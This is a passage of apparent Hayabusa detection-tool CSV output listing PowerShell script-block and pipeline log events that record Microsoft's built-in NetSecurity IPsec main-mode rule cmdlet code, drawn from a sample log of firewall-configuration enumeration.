-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('Po",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"licyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and 
(@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject 
(cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""New-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] 
${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.817 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
